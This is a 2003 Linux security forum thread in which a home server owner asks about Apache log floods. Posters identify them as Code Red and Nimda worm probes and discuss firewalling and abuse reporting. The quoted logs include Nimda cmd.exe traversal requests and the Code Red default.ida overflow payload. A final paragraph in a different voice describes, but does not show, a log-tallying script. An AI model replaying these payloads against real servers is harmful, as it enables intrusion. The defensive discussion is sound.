LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 03-12-2003, 07:18 PM   #1
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Rep: Reputation: 15
Help I am UNDER ATTACK...


My first impression is that an infected IIS server is making requests. I nmap'd the machine and it is a Windoze box. My problem: I am on AT&T and they "frown" upon servers, so no help there. I then did a DIG and came up with this URL: http://ns.cgocable.net/default.html. I tried the number but it is, of course, busy. Now, this is not the only time; it has filled my logs before, but I want to know what it is and, more importantly, how I can stop it.

Peace,
Ryan

Here is the tail of my Apache log:

[Wed Mar 12 00:09:25 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 00:09:25 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:28 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:28 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Mar 12 00:32:27 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 00:32:28 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 00:32:30 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 00:32:31 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 00:32:32 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:33 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:35 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:36 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:38 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:40 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:42 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:46 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:48 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Mar 12 01:33:37 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 01:43:19 2003] [error] [client 24.126.232.187] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 02:28:01 2003] [error] [client 24.102.204.168] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 03:03:35 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 03:47:26 2003] [error] [client 24.192.113.10] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:18:43 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 04:18:46 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 04:18:47 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 04:22:19 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:27:40 2003] [error] [client 24.237.50.177] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:58:19 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 05:27:18 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 07:19:46 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 09:37:01 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:29:40 2003] [error] [client 217.97.54.52] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:45:48 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:56:05 2003] [error] [client 24.161.237.200] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:58:38 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 13:02:22 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 13:27:43 2003] [error] [client 24.60.163.223] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 15:23:02 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 15:55:32 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 16:17:30 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 16:45:04 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 16:45:13 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:16 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
 
Old 03-12-2003, 08:28 PM   #2
m0rl0ck
Member
 
Registered: Nov 2002
Distribution: A totally 133t distro :)
Posts: 358

Rep: Reputation: 31
You could put them in hosts.deny or make an iptables rule to drop packets from them. The nice thing about a dropped packet is that they wouldn't get any notification back that you had gotten their connection attempt. If you drop the packet, I don't think it would even get to Apache.


You could also set up a Hotmail account to send your log files (stripped of any identifying info) to root, abuse, webmaster, postmaster, etc. at the offending domain. I would do this 5 or 10 times daily until I got a response.
(kidding)

Actually though, they aren't going to hurt anything other than taking up log space and a little bandwidth.
 
Old 03-12-2003, 08:57 PM   #3
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Interestingly enough, I cannot find any record on the net about these log entries. The one thing that does comfort me is the:

/winnt/system32/cmd.exe

at the end of the requests. It appears to be trying to infect a Windows box. This is very interesting.
 
Old 03-12-2003, 09:19 PM   #4
m0rl0ck
Member
 
Registered: Nov 2002
Distribution: A totally 133t distro :)
Posts: 358

Rep: Reputation: 31
I've got some too:

[Sat Mar 1 15:25:27 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/MSADC/root.exe
[Sat Mar 1 15:25:30 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Sat Mar 1 15:25:33 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Sat Mar 1 15:25:36 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:40 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:43 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:49 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..


Doesn't every httpd server in the universe (except for the MS ones, of course) have this stuff in its log files?
It's just the standard Code Red/Nimda stuff, isn't it?
 
Old 03-12-2003, 10:22 PM   #5
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
It may be. Could we figure out a way to block it, then inform the person that they should check out what is causing it? They might not know this is going on. If it is malicious in intent, then what?
 
Old 03-12-2003, 10:47 PM   #6
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Well, it certainly is malicious intent, but the thing that is interesting in your case is the directory it is going after. It is very common to see:

File does not exist: /var/www/html/MSADC/root.exe

in your log files. As m0rl0ck said, these are just your standard Nimda and Code Red viruses trying to exploit Microsoft IIS servers.

In your case it is looking in:

File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe

I've never seen this before. I wonder why it would be looking in an Apache directory on a Windows server.
 
Old 03-14-2003, 12:55 PM   #7
tcaptain
LQ Addict
 
Registered: Jul 2002
Location: Montreal
Distribution: Gentoo 2004 from stage 1 baby!
Posts: 1,403

Rep: Reputation: 45
Quote:
Originally posted by Crashed_Again: I've never seen this before. I wonder why it would be looking in an Apache directory on a Windows server.
Could it be an altered version made to target Apache on Windows systems?
 
Old 03-14-2003, 01:23 PM   #8
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
Still getting slammed by this...

All attempts to contact the ISP that owns the IPs have failed. The phone numbers don't work. It has to be coming from an infected Windoze machine. A hacker would not be this careless (IMHO). I am considering putting these IPs in hosts.deny, but that really doesn't solve the problem, especially in a DHCP world. Any suggestions on where to go from here are much appreciated.


Here is part of today's log.

24.60.246.31 - - [14/Mar/2003:05:58:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
24.60.246.31 - - [14/Mar/2003:05:58:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
24.60.246.31 - - [14/Mar/2003:05:58:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.60.246.31 - - [14/Mar/2003:05:58:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.60.246.31 - - [14/Mar/2003:05:58:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.60.246.31 - - [14/Mar/2003:05:58:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.101.172.221 - - [14/Mar/2003:06:10:30 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.95.173 - - [14/Mar/2003:07:46:54 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
211.124.183.184 - - [14/Mar/2003:08:13:32 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.162.205.223 - - [14/Mar/2003:09:09:03 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.136.158.105 - - [14/Mar/2003:09:19:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.136.158.105 - - [14/Mar/2003:09:19:51 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.136.158.105 - - [14/Mar/2003:09:19:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.136.158.105 - - [14/Mar/2003:09:19:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
24.136.158.105 - - [14/Mar/2003:09:19:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:53 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:54 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:55 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:56 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
24.136.158.105 - - [14/Mar/2003:09:19:56 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
24.136.158.105 - - [14/Mar/2003:09:19:57 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.136.158.105 - - [14/Mar/2003:09:19:57 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.60.120.134 - - [14/Mar/2003:09:51:27 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.120.134 - - [14/Mar/2003:10:06:49 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.120.134 - - [14/Mar/2003:10:12:42 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.95.173 - - [14/Mar/2003:10:35:19 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.192.228.186 - - [14/Mar/2003:13:28:16 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
 
Old 03-14-2003, 03:53 PM   #9
paranoid
LQ Newbie
 
Registered: Mar 2003
Location: Never more than 30 seconds from a keyboard
Distribution: Debian by choice, RH for Work, *BSD on and off
Posts: 13

Rep: Reputation: 0
The phone numbers don't work, but which phone numbers? Have you tried looking up the ISP's name in the phone directory and calling the number listed there?

If you firewall it, it'll consume MUCH less bandwidth (not hosts.deny; firewall-drop it).

Apart from that, well, it seems to be a machine infected by Nimda/Code Red and not a subhuman looking for machines to crack into... so... Nimda opens a backdoor on machines it has infected... but that would be illegal (troublesome priest, anyone?), so back to your telephone. Traceroute the thing, and identify the netblocks with geektools. Email abuse@ and security@ at the netblock owner. Make sure you say in the subject line that it's an ongoing DoS from IP xxxxxxx, and say in the body how long it's been going on, with log extracts, and mention whether your system is NTP-synchronized.

Now, I just looked back at your logs, and noticed that there are several IPs involved, not just one Nimda gone mad. Bet you're also with AT&T? Nimda tries adjacent subnets first. That means you have a lot of Nimda-infected people in your neighborhood.

Best I can say is grin and bear it; maybe extract logs once in a while, summarize, and send to the netblock owner... I was security admin at a broadband ISP when Nimda came out, and we had to cron-rotate and zip our logs every hour; otherwise the log partition filled up. We offloaded the logs, extracted the IPs, mailed or called the clients, blacklisted those we didn't get hold of, had to take calls from the ones who got blacklisted... it took us days until we'd even made an attempt at contacting them all, with new ones every hour, and we were in a really privileged position compared to you. Maybe (cough) AT&T don't care as much as we did, so they certainly aren't going to do better.

Last edited by paranoid; 03-15-2003 at 04:32 AM.
 
Old 03-14-2003, 03:54 PM   #10
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422Reputation: 422Reputation: 422Reputation: 422Reputation: 422
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracle's server responding to these probes in any way? If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
 
Old 03-14-2003, 05:19 PM   #11
tcaptain
LQ Addict
 
Registered: Jul 2002
Location: Montreal
Distribution: Gentoo 2004 from stage 1 baby!
Posts: 1,403

Rep: Reputation: 45
Quote:
Originally posted by Hangdog42
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracle's server responding to these probes in any way? If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
The way I understand it, the answer to this is... it depends.

You can set up your firewall to either drop or reject packets... so it can either respond with "bug off", as it were, or just ignore...

Anyone with more knowledge is free to contradict me...
 
Old 03-15-2003, 04:31 AM   #12
paranoid
LQ Newbie
 
Registered: Mar 2003
Location: Never more than 30 seconds from a keyboard
Distribution: Debian by choice, RH for Work, *BSD on and off
Posts: 13

Rep: Reputation: 0
Quote:
Originally posted by Hangdog42
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracle's server responding to these probes in any way?
Yes, sure: it's sending back a TCP ACK to answer the TCP SYN, telling Nimda that there is a web server at this address; Nimda then sends a request for the Microsoft (very soft) page, the server replies "sorry, I don't have this page", Nimda tries another page, and so on.

Quote:

If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
He'd still get the first probe, from every newly infected machine and from every infected machine that decides to try again, but not all the rest.

As for dropping or rejecting, that's a matter of taste depending on the rest of your firewall config, whether you reply to pings or not, exactly what you want the guy scanning you to think, whether you care about your outgoing bandwidth... could try both with Nimda and see what Nimda does. Dropping will make Nimda wait longer before deciding there was a problem, which is good, but might prompt the damned thing into trying again.
 
Old 03-15-2003, 07:35 AM   #13
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422Reputation: 422Reputation: 422Reputation: 422Reputation: 422
Thanks paranoid, I appreciate you taking time to answer.
 
Old 03-18-2003, 12:37 PM   #14
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
Sorry, I have been on vacation for the past couple of days.

paranoid - you are correct. I am on AT&T, and they :-( on servers, so I don't want to involve them. The phone numbers I have tried have been the WHOIS technical contact and the number at the addy http://ns.cgocable.net/default.html. I tried www.cgocable.ca and got 404s on the support pages.

By exporting my log files to Windows and using Access (unfortunately I have not found an all-around front-end DB app on Linux yet... any suggestions appreciated), I have gotten IP counts for each request and type. I have started from the largest offenders and am slowly working my way down the list, identifying and informing those I can get in touch with. Thanks for everyone's help.
 
Old 03-18-2003, 01:42 PM   #15
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Something must be done about these IIS exploits. I'm brainstorming now on writing a daemon that identifies these exploit requests and then drops them at the firewall. I'd also like to have it try to e-mail these infected servers with a nastygram. I'm sick of this crap in my log files. The LIFE (Linux Interceptors For Exploits) daemon.
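The per-IP tallying needamiracle did by exporting the logs to Access in #14, and the "identify the exploit request, drop it at the firewall" filter Crashed_Again sketches in #15, fit in a few dozen lines of Python. The following is an added example written for this thread, not code from any poster or from the LIFE daemon: it parses both log formats shown above (the error_log "File does not exist" lines from #1 and #4, and the access_log request lines from #8), labels each request as Code Red (default.ida) or Nimda (root.exe, cmd.exe, or an encoded ".." traversal), counts hits per source IP, and prints one iptables DROP rule per offender, worst first. The sample lines are constructed from addresses that appear in this thread plus one benign visitor (192.0.2.10) that must not end up in a rule; the signature list and the rule format are my assumptions. It emits iptables rules rather than hosts.deny entries because Apache does not 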